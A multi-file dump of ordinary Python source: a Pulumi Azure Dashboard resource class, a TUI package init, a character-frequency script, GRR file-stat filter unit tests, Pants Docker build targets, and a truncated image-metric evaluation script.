        :param pulumi.Input[str] name: Specifies the name of the Shared Dashboard. This should be 64 chars max, only alphanumeric and hyphens (no spaces). For a more friendly display name, add the `hidden-title` tag.
:param pulumi.Input[str] resource_group_name: The name of the resource group in which to
create the dashboard.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: DashboardArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Manages a shared dashboard in the Azure Portal.
## Example Usage
```python
import pulumi
import pulumi_azure as azure
config = pulumi.Config()
md_content = config.get("mdContent")
if md_content is None:
md_content = "# Hello all :)"
video_link = config.get("videoLink")
if video_link is None:
video_link = "https://www.youtube.com/watch?v=......"
current = azure.core.get_subscription()
my_group = azure.core.ResourceGroup("my-group", location="West Europe")
my_board = azure.dashboard.Dashboard("my-board",
resource_group_name=my_group.name,
location=my_group.location,
tags={
"source": "managed",
},
dashboard_properties=f\"\"\"{{
"lenses": {{
"0": {{
"order": 0,
"parts": {{
"0": {{
"position": {{
"x": 0,
"y": 0,
"rowSpan": 2,
"colSpan": 3
}},
"metadata": {{
"inputs": [],
"type": "Extension/HubsExtension/PartType/MarkdownPart",
"settings": {{
"content": {{
"settings": {{
"content": "{md_content}",
"subtitle": "",
"title": ""
}}
}}
}}
}}
}},
"1": {{
"position": {{
"x": 5,
"y": 0,
"rowSpan": 4,
"colSpan": 6
}},
"metadata": {{
"inputs": [],
"type": "Extension/HubsExtension/PartType/VideoPart",
"settings": {{
"content": {{
"settings": {{
"title": "Important Information",
"subtitle": "",
"src": "{video_link}",
"autoplay": true
}}
}}
}}
}}
}},
"2": {{
"position": {{
"x": 0,
"y": 4,
"rowSpan": 4,
"colSpan": 6
}},
"metadata": {{
"inputs": [
{{
"name": "ComponentId",
"value": "/subscriptions/{current.subscription_id}/resourceGroups/myRG/providers/microsoft.insights/components/myWebApp"
}}
],
"type": "Extension/AppInsightsExtension/PartType/AppMapGalPt",
"settings": {{}},
"asset": {{
"idInputName": "ComponentId",
"type": "ApplicationInsights"
}}
}}
}}
}}
}}
}},
"metadata": {{
"model": {{
"timeRange": {{
"value": {{
"relative": {{
"duration": 24,
"timeUnit": 1
}}
}},
"type": "MsPortalFx.Composition.Configuration.ValueTypes.TimeRange"
}},
"filterLocale": {{
"value": "en-us"
}},
"filters": {{
"value": {{
"MsPortalFx_TimeRange": {{
"model": {{
"format": "utc",
"granularity": "auto",
"relative": "24h"
}},
"displayCache": {{
"name": "UTC Time",
"value": "Past 24 hours"
}},
"filteredPartIds": [
"StartboardPart-UnboundPart-ae44fef5-76b8-46b0-86f0-2b3f47bad1c7"
]
}}
}}
}}
}}
}}
}}
\"\"\")
```
It is recommended to follow the steps outlined
        [here](https://docs.microsoft.com/en-us/azure/azure-portal/azure-portal-dashboards-create-programmatically#fetch-the-json-representation-of-the-dashboard) to create a Dashboard in the Portal and extract the relevant JSON to use in this resource. From the extracted JSON, the contents of the `properties: {}` object can be used. Variables can be injected as needed - see above example.
## Import
Dashboards can be imported using the `resource id`, e.g.
```sh
$ pulumi import azure:dashboard/dashboard:Dashboard my-board /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/rg1/providers/Microsoft.Portal/dashboards/00000000-0000-0000-0000-000000000000
```
Note the URI in the above sample can be found using the Resource Explorer tool in the Azure Portal.
:param str resource_name: The name of the resource.
:param DashboardArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(DashboardArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
dashboard_properties: Optional[pulumi.Input[str]] = None,
location: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = DashboardArgs.__new__(DashboardArgs)
__props__.__dict__["dashboard_properties"] = dashboard_properties
__props__.__dict__["location"] = location
__props__.__dict__["name"] = name
if resource_group_name is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_name'")
__props__.__dict__["resource_group_name"] = resource_group_name
__props__.__dict__["tags"] = tags
super(Dashboard, __self__).__init__(
'azure:dashboard/dashboard:Dashboard',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
dashboard_properties: Optional[pulumi.Input[str]] = None,
location: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None) -> 'Dashboard':
"""
Get an existing Dashboard resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] dashboard_properties: JSON data representing dashboard body. See above for details on how to obtain this from the Portal.
:param pulumi.Input[str] location: Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created.
        :param pulumi.Input[str] name: Specifies the name of the Shared Dashboard. This should be 64 chars max, only alphanumeric and hyphens (no spaces). For a more friendly display name, add the `hidden-title` tag.
:param pulumi.Input[str] resource_group_name: The name of the resource group in which to
create the dashboard.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _DashboardState.__new__(_DashboardState)
__props__.__dict__["dashboard_properties"] = dashboard_properties
__props__.__dict__["location"] = location
__props__.__dict__["name"] = name
__props__.__dict__["resource_group_name"] = resource_group_name
__props__.__dict__["tags"] = tags
return Dashboard(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="dashboardProperties")
def dashboard_properties(self) -> pulumi.Output[str]:
"""
JSON data representing dashboard body. See above for details on how to obtain this from the Portal.
"""
return pulumi.get(self, "dashboard_properties")
@property
@pulumi.getter
def location(self) -> pulumi.Output[str]:
"""
Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "location")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
        Specifies the name of the Shared Dashboard. This should be 64 chars max, only alphanumeric and hyphens (no spaces). For a more friendly display name, add the `hidden-title` tag.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Output[str]:
"""
The name of the resource group in which to
create the dashboard.
"""
return pulumi.get(self, "resource_group_name")
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
"""
A mapping of tags to assign to the resource.
"""
return pulumi.get(self, "tags")
|
#!/usr/bin/env python3
from .input import myinput
from .utils import loop, mywrapper
from .widgets import Border, CMDInput, Text, VList
__all__ = [
'loop',
'myinput',
'mywrapper',
# widgets
'Border',
'CMDInput',
'Text',
'VList',
]
name = 'mytui'
|
'''Character counting as a fold'''
from functools import reduce
from itertools import repeat
from os.path import expanduser
# charCounts :: String -> Dict Char Int
def charCounts(s):
'''A dictionary of
(character, frequency) mappings
'''
def tally(dct, c):
dct[c] = 1 + dct[c] if c in dct else 1
return dct
return reduce(tally, list(s), {})
# TEST ----------------------------------------------------
# main :: IO ()
def main():
'''Listing in descending order of frequency.'''
print((
tabulated(
'Descending order of frequency:\n'
)(compose(repr)(fst))(compose(str)(snd))(
5
)(stet)(
sorted(
list(charCounts(
readFile('~/Code/charCount/readme.txt')
).items()),
key=swap,
reverse=True
)
)
))
# GENERIC -------------------------------------------------
# chunksOf :: Int -> [a] -> [[a]]
def chunksOf(n):
'''A series of lists of length n,
subdividing the contents of xs.
       Where the length of xs is not evenly divisible,
the final list will be shorter than n.'''
return lambda xs: reduce(
lambda a, i: a + [xs[i:n + i]],
list(range(0, len(xs), n)), []
) if 0 < n else []
# compose (<<<) :: (b -> c) -> (a -> b) -> a -> c
def compose(g):
'''Right to left function composition.'''
return lambda f: lambda x: g(f(x))
# fst :: (a, b) -> a
def fst(tpl):
'''First member of a pair.'''
return tpl[0]
# readFile :: FilePath -> IO String
def readFile(fp):
'''The contents of any file at the path
derived by expanding any ~ in fp.'''
with open(expanduser(fp), 'r', encoding='utf-8') as f:
return f.read()
# paddedMatrix :: a -> [[a]] -> [[a]]
def paddedMatrix(v):
    '''A list of rows padded to equal length
(where needed) with instances of the value v.'''
def go(rows):
return paddedRows(
len(max(rows, key=len))
)(v)(rows)
return lambda rows: go(rows) if rows else []
# paddedRows :: Int -> a -> [[a]] -> [[a]]
def paddedRows(n):
'''A list of rows padded (but never truncated)
to length n with copies of value v.'''
def go(v, xs):
def pad(x):
d = n - len(x)
return (x + list(repeat(v, d))) if 0 < d else x
return list(map(pad, xs))
return lambda v: lambda xs: go(v, xs) if xs else []
# showColumns :: Int -> [String] -> String
def showColumns(n):
'''A column-wrapped string
derived from a list of rows.'''
def go(xs):
def fit(col):
w = len(max(col, key=len))
def pad(x):
return x.ljust(4 + w, ' ')
return ''.join(map(pad, col)).rstrip()
q, r = divmod(len(xs), n)
return '\n'.join(map(
fit,
list(zip(*paddedMatrix('')(
chunksOf(q + int(bool(r)))(xs)
)))
))
return lambda xs: go(xs)
# snd :: (a, b) -> b
def snd(tpl):
'''Second member of a pair.'''
return tpl[1]
# stet :: a -> a
def stet(x):
'''The identity function.
The usual 'id' is reserved in Python.'''
return x
# swap :: (a, b) -> (b, a)
def swap(tpl):
'''The swapped components of a pair.'''
return (tpl[1], tpl[0])
# tabulated :: String -> (a -> String) ->
# (b -> String) ->
# Int ->
# (a -> b) -> [a] -> String
def tabulated(s):
'''Heading -> x display function -> fx display function ->
number of columns -> f -> value list -> tabular string.'''
def go(xShow, fxShow, intCols, f, xs):
def mxw(fshow, g):
return max(list(map(compose(len)(fshow), list(map(g, xs)))))
w = mxw(xShow, lambda x: x)
fw = mxw(fxShow, f)
return s + '\n' + showColumns(intCols)([
xShow(x).rjust(w, ' ') + ' -> ' + (
fxShow(f(x)).rjust(fw, ' ')
)
for x in xs
])
return lambda xShow: lambda fxShow: lambda nCols: (
lambda f: lambda xs: go(
xShow, fxShow, nCols, f, xs
)
)
# MAIN ---
if __name__ == '__main__':
main()
|
#!/usr/bin/env python
"""Tests for grr.server.checks.filters."""
import collections
from grr.lib import flags
from grr.lib.rdfvalues import anomaly
from grr.lib.rdfvalues import client as rdf_client
from grr.lib.rdfvalues import paths as rdf_paths
from grr.lib.rdfvalues import protodict as rdf_protodict
from grr.server.checks import checks
from grr.server.checks import filters
from grr.test_lib import test_lib
# Just a named tuple that can be used to test objectfilter expressions.
Sample = collections.namedtuple("Sample", ["x", "y"])
class BaseFilterTests(test_lib.GRRBaseTest):
"""Test base filter methods and operations."""
def testEnforceList(self):
filt = filters.Filter()
self.assertRaises(filters.ProcessingError, filt.Parse, "not_a_list", False)
def testValidate(self):
filt = filters.Filter()
self.assertRaises(NotImplementedError, filt.Validate, "anything")
def testParse(self):
filt = filters.Filter()
self.assertRaises(NotImplementedError, filt.Parse, [], "do nothing")
class AttrFilterTests(test_lib.GRRBaseTest):
"""Test attribute filter methods and operations."""
def testValidate(self):
filt = filters.AttrFilter()
self.assertRaises(filters.DefinitionError, filt.Validate, " ")
self.assertFalse(filt.Validate("cfg1"))
self.assertFalse(filt.Validate("cfg1 cfg1.test1"))
def testParse(self):
filt = filters.AttrFilter()
hit1 = rdf_protodict.AttributedDict(k1="hit1", k2="found1", k3=[3, 4])
hit2 = rdf_protodict.AttributedDict(k1="hit2", k2="found2")
meta = rdf_protodict.AttributedDict(one=hit1, two=hit2)
objs = [hit1, hit2, meta]
results = filt.Parse(objs, "k1 k2 one.k3")
self.assertEqual(5, len(results))
r1, r2, r3, r4, r5 = results
self.assertEqual("k1", r1.key)
self.assertEqual("hit1", r1.value)
self.assertEqual("k1", r2.key)
self.assertEqual("hit2", r2.value)
self.assertEqual("k2", r3.key)
self.assertEqual("found1", r3.value)
self.assertEqual("k2", r4.key)
self.assertEqual("found2", r4.value)
self.assertEqual("one.k3", r5.key)
self.assertEqual([3, 4], r5.value)
class ItemFilterTests(test_lib.GRRBaseTest):
"""Test item filter methods and operations."""
def testParse(self):
filt = filters.ItemFilter()
one = rdf_protodict.AttributedDict(test1="1", test2=[2, 3])
foo = rdf_protodict.AttributedDict(test1="foo", test2=["bar", "baz"])
fs = rdf_client.Filesystem(device="/dev/sda1", mount_point="/root")
objs = [one, foo, fs]
results = filt.Parse(objs, "test1 is '1'")
self.assertEqual(1, len(results))
self.assertEqual("test1", results[0].key)
self.assertEqual("1", results[0].value)
results = filt.Parse(objs, "test1 is '2'")
self.assertFalse(results)
results = filt.Parse(objs, "test2 contains 3")
self.assertEqual(1, len(results))
self.assertEqual("test2", results[0].key)
self.assertEqual([2, 3], results[0].value)
results = filt.Parse(objs, "test1 is '1' or test1 contains 'foo'")
self.assertEqual(2, len(results))
self.assertEqual("test1", results[0].key)
self.assertEqual("1", results[0].value)
self.assertEqual("test1", results[1].key)
self.assertEqual("foo", results[1].value)
results = filt.Parse(objs, "mount_point is '/root'")
self.assertEqual(1, len(results))
self.assertEqual("mount_point", results[0].key)
self.assertEqual("/root", results[0].value)
class ForEachTests(test_lib.GRRBaseTest):
"""Test ForEach filter methods and operations."""
def testValidate(self):
filt = filters.ForEach()
self.assertRaises(filters.DefinitionError, filt.Validate, " ")
self.assertRaises(filters.DefinitionError, filt.Validate, "attr1 attr2")
self.assertFalse(filt.Validate("attr1"))
def testParse(self):
filt = filters.ForEach()
hit1 = rdf_protodict.AttributedDict(k1="v1", k2="v2", k3="v3")
hit2 = rdf_protodict.AttributedDict(k1="v4", k2="v5", k3="v6")
meta = rdf_protodict.AttributedDict(
foo=["foo", "bar"], target=[hit1, hit2], null=[])
objs = [meta]
results = filt.Parse(objs, "target")
self.assertEqual(2, len(results))
self.assertItemsEqual([hit1, hit2], [r.item for r in results])
results = filt.Parse(objs, "foo")
self.assertEqual(2, len(results))
self.assertItemsEqual(["foo", "bar"], [r.item for r in results])
results = filt.Parse(objs, "null")
self.assertEqual(0, len(results))
class ObjectFilterTests(test_lib.GRRBaseTest):
"""Test object filter methods and operations."""
def testValidate(self):
filt = filters.ObjectFilter()
self.assertRaises(filters.DefinitionError, filt.Validate, "bad term")
self.assertFalse(filt.Validate("test is 'ok'"))
def testParse(self):
filt = filters.ObjectFilter()
hit1 = rdf_protodict.AttributedDict(test="hit1")
hit2 = rdf_protodict.AttributedDict(test="hit2")
miss = rdf_protodict.AttributedDict(test="miss")
objs = [hit1, hit2, miss]
results = filt.Parse(objs, "test is 'hit1'")
self.assertItemsEqual([hit1], results)
results = filt.Parse(objs, "test is 'hit2'")
self.assertItemsEqual([hit2], results)
results = filt.Parse(objs, "test inset 'hit1,hit2'")
self.assertItemsEqual([hit1, hit2], results)
class RDFFilterTests(test_lib.GRRBaseTest):
"""Test rdf filter methods and operations."""
def testValidate(self):
filt = filters.RDFFilter()
self.assertFalse(filt.Validate("KnowledgeBase,AttributedDict"))
self.assertRaises(filters.DefinitionError, filt.Validate,
"KnowledgeBase,Nonexistent")
def testParse(self):
filt = filters.RDFFilter()
cfg = rdf_protodict.AttributedDict()
anom = anomaly.Anomaly()
objs = [cfg, anom]
results = filt.Parse(objs, "KnowledgeBase")
self.assertFalse(results)
results = filt.Parse(objs, "AttributedDict,KnowledgeBase")
self.assertItemsEqual([cfg], results)
results = filt.Parse(objs, "Anomaly,AttributedDict,KnowledgeBase")
self.assertItemsEqual(objs, results)
class StatFilterTests(test_lib.GRRBaseTest):
"""Test stat filter methods and operations."""
bad_null = ["", " :"]
bad_file = ["file_re:[[["]
bad_gids = ["gid: ", "gid 0", "gid:0", "gid:=", "gid:gid:"]
bad_mode = ["mode 755", "mode:755", "mode:0999", "mode:0777,0775"]
bad_mask = ["mask 755", "mask:755", "mask:0999", "mask:0777,0775"]
bad_path = ["path_re:[[["]
bad_type = [
"file_type: ", "file_type foo", "file_type:foo",
"file_type:directory,regular"
]
bad_uids = ["uid: ", "uid 0", "uid:0", "uid:=", "uid:gid:"]
badness = [
bad_null, bad_file, bad_gids, bad_mask, bad_mode, bad_path, bad_type,
bad_uids
]
ok_file = ["file_re:/etc/passwd"]
ok_gids = ["gid:=0", "gid:=1,>1,<1,>=1,<=1,!1"]
ok_mode = ["mode:0002"]
ok_mask = ["mode:1002"]
ok_path = ["path_re:/home/*"]
ok_type = ["file_type:REGULAR", "file_type:directory"]
ok_uids = ["uid:=0", "uid:=1,>1,<1,>=1,<=1,!1"]
just_fine = [ok_file, ok_gids, ok_mask, ok_mode, ok_path, ok_type, ok_uids]
def _GenStat(self,
path="/etc/passwd",
st_mode=33184,
st_ino=1063090,
st_dev=64512L,
st_nlink=1,
st_uid=1001,
st_gid=5000,
st_size=1024,
st_atime=1336469177,
st_mtime=1336129892,
st_ctime=1336129892):
"""Generate a StatEntry RDF value."""
pathspec = rdf_paths.PathSpec(
path=path, pathtype=rdf_paths.PathSpec.PathType.OS)
return rdf_client.StatEntry(
pathspec=pathspec,
st_mode=st_mode,
st_ino=st_ino,
st_dev=st_dev,
st_nlink=st_nlink,
st_uid=st_uid,
st_gid=st_gid,
st_size=st_size,
st_atime=st_atime,
st_mtime=st_mtime,
st_ctime=st_ctime)
def testValidate(self):
filt = filters.StatFilter()
for params in self.badness:
for bad in params:
self.assertRaises(filters.DefinitionError, filt.Validate, bad)
for params in self.just_fine:
for ok in params:
self.assertTrue(filt.Validate(ok), "Rejected valid expression: %s" % ok)
def testFileTypeParse(self):
"""FileType filters restrict results to specified file types."""
all_types = {
"BLOCK": self._GenStat(st_mode=24992), # 0060640
"Character": self._GenStat(st_mode=8608), # 0020640
"directory": self._GenStat(st_mode=16873), # 0040751
"fiFO": self._GenStat(st_mode=4534), # 0010666
"REGULAR": self._GenStat(st_mode=33204), # 0100664
"socket": self._GenStat(st_mode=49568), # 0140640
"SymLink": self._GenStat(st_mode=41471)
} # 0120777
filt = filters.StatFilter()
for file_type, expected in all_types.iteritems():
filt._Flush()
results = filt.Parse(all_types.values(), "file_type:%s" % file_type)
self.assertEqual(1, len(results), "Expected exactly 1 %s" % file_type)
self.assertEqual(expected, results[0],
"Expected stat %s, got %s" % (expected, results[0]))
def testFileREParse(self):
"""File regexes operate successfully."""
filt = filters.StatFilter()
obj1 = self._GenStat(path="/etc/passwd")
obj2 = self._GenStat(path="/etc/alternatives/ssh-askpass")
obj3 = self._GenStat(path="/etc/alternatives/ssh-askpass.1.gz")
objs = [obj1, obj2, obj3]
results = filt.Parse(objs, "file_re:pass")
self.assertItemsEqual(objs, results)
results = filt.Parse(objs, "file_re:pass$")
self.assertItemsEqual([obj2], results)
results = filt.Parse(objs, "file_re:^pass")
self.assertItemsEqual([obj1], results)
def testPathREParse(self):
"""Path regexes operate successfully."""
filt = filters.StatFilter()
obj1 = self._GenStat(path="/etc/passwd")
obj2 = self._GenStat(path="/etc/alternatives/ssh-askpass")
obj3 = self._GenStat(path="/etc/alternatives/ssh-askpass.1.gz")
objs = [obj1, obj2, obj3]
results = filt.Parse(objs, "path_re:/etc/*")
self.assertItemsEqual(objs, results)
results = filt.Parse(objs, "path_re:alternatives")
self.assertItemsEqual([obj2, obj3], results)
results = filt.Parse(objs, "path_re:alternatives file_re:pass$")
self.assertItemsEqual([obj2], results)
def testGIDParse(self):
"""GID comparisons operate successfully."""
filt = filters.StatFilter()
obj1 = self._GenStat(st_gid=0)
obj2 = self._GenStat(st_gid=500)
obj3 = self._GenStat(st_gid=5000)
objs = [obj1, obj2, obj3]
results = filt.Parse(objs, "gid:=0")
self.assertItemsEqual([obj1], results)
results = filt.Parse(objs, "gid:>=0")
self.assertItemsEqual(objs, results)
results = filt.Parse(objs, "gid:>0")
self.assertItemsEqual([obj2, obj3], results)
results = filt.Parse(objs, "gid:>0,<=5000")
self.assertItemsEqual([obj2, obj3], results)
results = filt.Parse(objs, "gid:>0,<5000")
self.assertItemsEqual([obj2], results)
results = filt.Parse(objs, "gid:!5000")
self.assertItemsEqual([obj1, obj2], results)
def testUIDParse(self):
"""UID comparisons operate successfully."""
filt = filters.StatFilter()
obj1 = self._GenStat(st_uid=1001)
obj2 = self._GenStat(st_uid=5000)
objs = [obj1, obj2]
results = filt.Parse(objs, "uid:=0")
self.assertFalse(results)
results = filt.Parse(objs, "uid:=1001")
self.assertItemsEqual([obj1], results)
results = filt.Parse(objs, "uid:>=0")
self.assertItemsEqual(objs, results)
results = filt.Parse(objs, "uid:>0")
self.assertItemsEqual(objs, results)
results = filt.Parse(objs, "uid:>0,<=5000")
self.assertItemsEqual(objs, results)
results = filt.Parse(objs, "uid:>0,<5000")
self.assertItemsEqual([obj1], results)
results = filt.Parse(objs, "uid:!5000")
self.assertItemsEqual([obj1], results)
def testPermissionsParse(self):
"""Permissions comparisons operate successfully."""
filt = filters.StatFilter()
obj1 = self._GenStat(st_mode=0100740)
obj2 = self._GenStat(st_mode=0100755)
objs = [obj1, obj2]
results = filt.Parse(objs, "mode:0644")
self.assertFalse(results)
results = filt.Parse(objs, "mode:0740")
self.assertItemsEqual([obj1], results)
results = filt.Parse(objs, "mode:0640 mask:0640")
self.assertItemsEqual(objs, results)
results = filt.Parse(objs, "mode:0014 mask:0014")
self.assertItemsEqual([obj2], results)
def testParseFileObjs(self):
"""Multiple file types are parsed successfully."""
filt = filters.StatFilter()
ok = self._GenStat(path="/etc/shadow", st_uid=0, st_gid=0, st_mode=0100640)
link = self._GenStat(
path="/etc/shadow", st_uid=0, st_gid=0, st_mode=0120640)
user = self._GenStat(
path="/etc/shadow", st_uid=1000, st_gid=1000, st_mode=0100640)
writable = self._GenStat(
path="/etc/shadow", st_uid=0, st_gid=0, st_mode=0100666)
cfg = {"path": "/etc/shadow", "st_uid": 0, "st_gid": 0, "st_mode": 0100640}
invalid = rdf_protodict.AttributedDict(**cfg)
objs = [ok, link, user, writable, invalid]
results = filt.Parse(objs, "uid:>=0 gid:>=0")
self.assertItemsEqual([ok, link, user, writable], results)
results = filt.Parse(objs, "uid:=0 mode:0440 mask:0440")
self.assertItemsEqual([ok, link, writable], results)
results = filt.Parse(objs, "uid:=0 mode:0440 mask:0444")
self.assertItemsEqual([ok, link], results)
results = list(
filt.Parse(objs, "uid:=0 mode:0440 mask:0444 file_type:regular"))
self.assertItemsEqual([ok], results)
class FilterRegistryTests(test_lib.GRRBaseTest):
"""Test filter methods and operations."""
def testFilterRegistry(self):
filters.Filter.filters = {}
filt = filters.Filter.GetFilter("Filter")
# It should be the right type of filter.
# And should be in the registry already.
self.assertIsInstance(filt, filters.Filter)
# The registry must never give the same object to multiple callers.
self.assertNotEqual(filt, filters.Filter.GetFilter("Filter"))
filt = filters.Filter.GetFilter("ObjectFilter")
self.assertIsInstance(filt, filters.ObjectFilter)
self.assertNotEqual(filt, filters.Filter.GetFilter("ObjectFilter"))
filt = filters.Filter.GetFilter("RDFFilter")
self.assertIsInstance(filt, filters.RDFFilter)
self.assertNotEqual(filt, filters.Filter.GetFilter("RDFFilter"))
filters.Filter.filters = {}
self.assertRaises(filters.DefinitionError, filters.Filter.GetFilter, "???")
class HandlerTests(test_lib.GRRBaseTest):
"""Test handler operations."""
def setUp(self):
super(HandlerTests, self).setUp()
fx0 = checks.Filter({"type": "ObjectFilter", "expression": "x == 0"})
fy0 = checks.Filter({"type": "ObjectFilter", "expression": "y == 0"})
bad = checks.Filter({"type": "ObjectFilter", "expression": "y =="})
self.ok = [fx0, fy0]
self.bad = [fx0, fy0, bad]
self.all = [Sample(0, 0), Sample(0, 1), Sample(1, 0), Sample(1, 1)]
def GetFilters(self, filt_defs):
"""Initialize one or more filters as if they were contained in a probe."""
# The artifact isn't actually used for anything, it's just required to
# initialize handlers.
probe = checks.Probe(artifact="Data", filters=filt_defs)
return probe.filters
def testValidateFilters(self):
self.assertEquals(2, len(self.GetFilters(self.ok)))
self.assertRaises(filters.DefinitionError, self.GetFilters, self.bad)
def testBaseHandler(self):
# Handler needs an artifact.
self.assertRaises(filters.DefinitionError, filters.BaseHandler)
h = filters.BaseHandler("STUB")
self.assertRaises(NotImplementedError, h.Parse, "STUB")
def testNoOpHandler(self):
h = filters.GetHandler("PASSTHROUGH")
handler = h("Data", filters=self.GetFilters(self.ok))
self.assertItemsEqual(self.all, handler.Parse(self.all))
def testParallelHandler(self):
h = filters.GetHandler("PARALLEL")
# Without filters.
handler = h("Data", filters=[])
self.assertItemsEqual(self.all, handler.Parse(self.all))
# With filters.
handler = h("Data", filters=self.GetFilters(self.ok))
expected = [Sample(0, 0), Sample(0, 1), Sample(1, 0)]
self.assertItemsEqual(expected, handler.Parse(self.all))
def testSerialHandler(self):
h = filters.GetHandler("SERIAL")
# Without filters.
handler = h("Data", filters=[])
self.assertItemsEqual(self.all, handler.Parse(self.all))
# With filters.
handler = h("Data", filters=self.GetFilters(self.ok))
expected = [Sample(0, 0)]
self.assertItemsEqual(expected, handler.Parse(self.all))
def main(argv):
test_lib.main(argv)
if __name__ == "__main__":
flags.StartMain(main)
|
from __future__ import absolute_import
from pants.base.build_environment import get_scm
from pants.base.payload import Payload
from pants.base.payload_field import PrimitiveField
from pants.build_graph.target import Target
class DockerTargetBase(Target):
def __init__(self, address=None, payload=None, image_name=None, image_tag=None, **kwargs):
payload = payload or Payload()
payload.add_fields({
'image_name': PrimitiveField(image_name),
'image_tag': PrimitiveField('c' + get_scm().commit_id)
})
self.image_name = image_name
self.image_tag = image_tag
super(DockerTargetBase, self).__init__(address=address, payload=payload, **kwargs)
class DockerBundleTarget(DockerTargetBase):
def __init__(self, base_image=None, payload=None, **kwargs):
payload = payload or Payload()
payload.add_fields({
'base_image': PrimitiveField(base_image)
})
self.base_image = base_image
super(DockerBundleTarget, self).__init__(payload=payload, **kwargs)
class DockerJvmAppTarget(DockerBundleTarget):
pass
class DockerPythonTarget(DockerBundleTarget):
pass
|
from __future__ import print_function
import os, pdb, sys, glob
# we need to set the GPU number first, otherwise we may run out of memory
stage = int(sys.argv[1])
gpuNO = sys.argv[2]
model_dir = sys.argv[3]
test_dir = sys.argv[4]
os.environ["CUDA_DEVICE_ORDER"]="PCI_BUS_ID"
os.environ["CUDA_VISIBLE_DEVICES"]=str(gpuNO)
import StringIO
import scipy.misc
import numpy as np
from skimage.measure import compare_ssim as ssim
from skimage.measure import compare_psnr as psnr
from skimage.color import rgb2gray
# from PIL import Image
import scipy.misc
import tflib
import tflib.inception_score
def l1_mean_dist(x,y):
# return np.sum(np.abs(x-y))
diff = x.astype(float)-y.astype(float)
return np.sum(np.abs(diff))/np.product(x.shape)
def l2_mean_dist(x,y):
# return np.sqrt(np.sum((x-y)**2))
diff = x.astype(float)-y.astype(float)
return np.sqrt(np.sum(diff**2))/np.product(x.shape)
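# Note on normalization: both helpers divide by the total number of elements,
# so for two arrays that differ by exactly 1 at every position l1_mean_dist
# returns 1.0 while l2_mean_dist returns sqrt(N)/N = 1/sqrt(N),
# with N = np.product(x.shape).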
# pdb.set_trace()
if 1==stage:
test_result_dir_x = os.path.join(model_dir, test_dir, 'x_target')
# test_result_dir_x = os.path.join(model_dir, test_dir, 'x')
test_result_dir_G = os.path.join(model_dir, test_dir, 'G')
test_result_dir_mask = os.path.join(model_dir, test_dir, 'mask')
score_path = os.path.join(model_dir, test_dir, 'score_mask.txt')
types = ('*.jpg', '*.png') # the tuple of file types
x_files = []
G_files = []
mask_files = []
for files in types:
x_files.extend(glob.glob(os.path.join(test_result_dir_x, files)))
G_files.extend(glob.glob(os.path.join(test_result_dir_G, files)))
mask_files.extend(glob.glob(os.path.join(test_result_dir_mask, files)))
x_target_list = []
for path in x_files:
x_target_list.append(scipy.misc.imread(path))
G_list = []
for path in G_files:
G_list.append(scipy.misc.imread(path))
mask_target_list = []
for path in mask_files:
mask_target_list.append(scipy.misc.imread(path))
N = len(G_files)
##################### SSIM ##################
ssim_G_x = []
psnr_G_x = []
L1_mean_G_x = []
L2_mean_G_x = []
# x_0_255 = utils_wgan.unprocess_image(x_fixed, 127.5, 127.5)
x_0_255 = x_target_list
for i in xrange(N):
# G_gray = rgb2gray((G_list[i]/127.5-1).clip(min=-1,max=1))
# x_target_gray = rgb2gray((x_target_list[i]/127.5-1).clip(min=-1,max=1))
# gray image, [0,1]
# G_gray = rgb2gray((G_list[i]).clip(min=0,max=255))
# x_target_gray = rgb2gray((x_target_list[i]).clip(min=0,max=255))
# ssim_G_x.append(ssim(G_gray, x_target_gray, data_range=x_target_gray.max()-x_target_gray.min(), multichannel=False))
# psnr_G_x.append(psnr(im_true=x_target_gray, im_test=G_gray, data_range=x_target_gray.max()-x_target_gray.min()))
# L1_mean_G_x.append(l1_mean_dist(G_gray, x_target_gray))
# L2_mean_G_x.append(l2_mean_dist(G_gray, x_target_gray))
# color image
# ssim_G_x.append(ssim(G_list[i], x_target_list[i], multichannel=True))
masked_G_array = np.uint8(mask_target_list[i][:,:,np.newaxis]/255.*G_list[i])
masked_x_target_array = np.uint8(mask_target_list[i][:,:,np.newaxis]/255.*x_target_list[i])
